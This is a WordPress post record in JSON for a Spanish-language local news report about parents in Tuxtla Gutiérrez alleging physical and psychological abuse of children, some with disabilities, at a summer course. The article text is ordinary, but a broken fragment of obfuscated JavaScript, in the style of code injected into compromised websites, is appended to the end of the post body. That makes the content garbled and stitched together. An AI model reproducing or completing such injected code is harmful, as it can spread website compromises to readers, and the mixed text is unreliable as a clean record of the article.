{"id":23293,"date":"2025-08-01T03:05:08","date_gmt":"2025-08-01T03:05:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23293"},"modified":"2025-08-01T03:05:09","modified_gmt":"2025-08-01T03:05:09","slug":"detectan-malos-tratos-a-ninos-especiales-en-curso-de-verano","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23293","title":{"rendered":"Detectan malos tratos a ni\u00f1os especiales en curso de verano"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"400\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000255069.jpg\" alt=\"\" class=\"wp-image-23294\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000255069.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000255069-300x167.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>31 de julio del 2025. Tuxtla Guti\u00e9rrez.- Padres de familia que inscribieron a un curso de verano en el Centro DA Psicointegral, a sus hijos denunciaron maltrato f\u00edsico y psicol\u00f3gico.<\/p>\n\n\n\n<p>En la denuncia informaron que inscribieron a sus hijos en un curso de verano con costos de hasta 5 mil pesos por tres o cuatro semanas, prometi\u00e9ndoles actividades de estimulaci\u00f3n motriz, lenguaje y modificaci\u00f3n de conducta.<\/p>\n\n\n\n<p>Sin embargo, desde el primer d\u00eda, los padres de familia detectaron comportamientos \u201cirregulares\u201d en los menores.<\/p>\n\n\n\n<p>Se\u00f1alaron presuntos maltratos f\u00edsicos y psicol\u00f3gicos hacia menores, incluidos ni\u00f1os con discapacidad.<\/p>\n\n\n\n<p>\u201cMi hijo de 3 a\u00f1os y medio, con discapacidad psicosocial, regres\u00f3 llorando, arrastr\u00e1ndose y pidiendo agua desesperadamente, en este lugar no le dieron ni agua ni comida\u201d, relat\u00f3 una madre de familia.<\/p>\n\n\n\n<p>Pero esto no fue todo ya que al cuestionar al personal por encontrar marcas en sus brazos le atribuyeron las lesiones a &#8220;irritaci\u00f3n por la ropa&#8221;.<\/p>\n\n\n\n<p>Otros padres de familia agregaron que en otros casos, menores de 8 a 10 a\u00f1os, quienes asist\u00edan al mismo centro, contaron a sus padres que los obligaban a cuidar a los m\u00e1s peque\u00f1os y fueron testigos de varios abusos.<\/p>\n\n\n\n<p>Se\u00f1alaron gritos, golpes y castigos prolongados como hacerles mirar la pared por m\u00e1s de 30 minutos. Un ni\u00f1o fue encerrado en una mochila para obligarlo a hacer sus necesidades.<\/p>\n\n\n\n<p>En este contexto dieron a conocer que ya han presentado una denuncia ante la FGE para que este caso sea investigado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 31 de julio del 2025. Tuxtla Guti\u00e9rrez.- Padres de familia que inscribieron a un curso de verano en el Centro DA Psicointegral, a sus hijos denunciaron maltrato f\u00edsico y psicol\u00f3gico. En la denuncia informaron que inscribieron a sus hijos en un curso de verano con costos de hasta 5 mil pesos por tres &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23294,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23293","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23293"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23293\/revisions"}],"predecessor-version":[{"id":23295,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23293\/revisions\/23295"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23294"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}